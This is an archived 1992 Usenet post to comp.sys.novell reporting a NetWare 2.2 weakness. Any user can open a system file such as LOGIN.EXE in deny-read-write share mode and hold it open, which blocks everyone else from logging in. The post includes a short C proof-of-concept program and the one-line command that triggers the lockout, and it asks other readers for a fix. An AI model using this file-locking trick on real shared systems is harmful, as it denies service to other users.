home *** CD-ROM | disk | FTP | other *** search
- Path: sparky!uunet!cs.utexas.edu!swrinde!emory!ogicse!psgrain!hippo!shrike.und.ac.za!casper.cs.uct.ac.za!smarquar
- From: smarquar@casper.cs.uct.ac.za (S C Marquard)
- Newsgroups: comp.sys.novell
- Subject: Opening files in read-only, deny read&write mode
- Summary: Opening a file in RO, deny R&W mode denies other users access
- Keywords: file-sharing
- Message-ID: <Bxyo8x.E4G@casper.cs.uct.ac.za>
- Date: 19 Nov 92 11:36:33 GMT
- Article-I.D.: casper.Bxyo8x.E4G
- Organization: Computer Science Department, University of Cape Town
- Lines: 49
-
- I tried the following on a NW2.2 network:
-
- A user with only [RF] rights in SYS:LOGIN and SYS:PUBLIC runs a program
- which opens a file in read-only, deny read&write mode. As one might
- expect, any other user is then prevented from reading that file, no matter
- what their rights are.
-
- Now this is all very well, but what happens when a user (ANY user)
- opens, say SYS:LOGIN\LOGIN.EXE, and doesn't close it again. All other
- users are then prevented from logging in. The same could be done to
- SYSCON, MAP, you name it...
-
- Is there any way of preventing this, or are all networks vulnerable to
- the first obstructionist user who arrives with a program which will
- open a file in deny read&write mode and not close it again?
-
- I used the following program to test this (compiled with Borland C++ v3.0):
- #include <stdlib.h>
- #include <stdio.h>
- #include <conio.h>
- #include <share.h>
-
- void main(int argc, char* argv[])
- {
- printf("Opening %s in mode %s / %i\n",argv[1], argv[2], atoi(argv[3]));
- FILE *fp= _fsopen(argv[1], argv[2], atoi(argv[3]));
-
- if (fp!=NULL)
- {
- printf("Open...");
- getch();
- fclose(fp);
- printf("closed\n");
- }
-
- return;
- }
-
- GRAB F:LOGIN.EXE rb 16
- is enough to cripple things, and can be done by any user.
-
- Any solutions?
-
- Stephen Marquard
- University of Cape Town
- -------------------------------------------------------------
- Internet: smarquar@casper.cs.uct.ac.za
- Fidonet: Stephen.Marquard@p3.f120.n7102.z5.fidonet.org
- -------------------------------------------------------------
-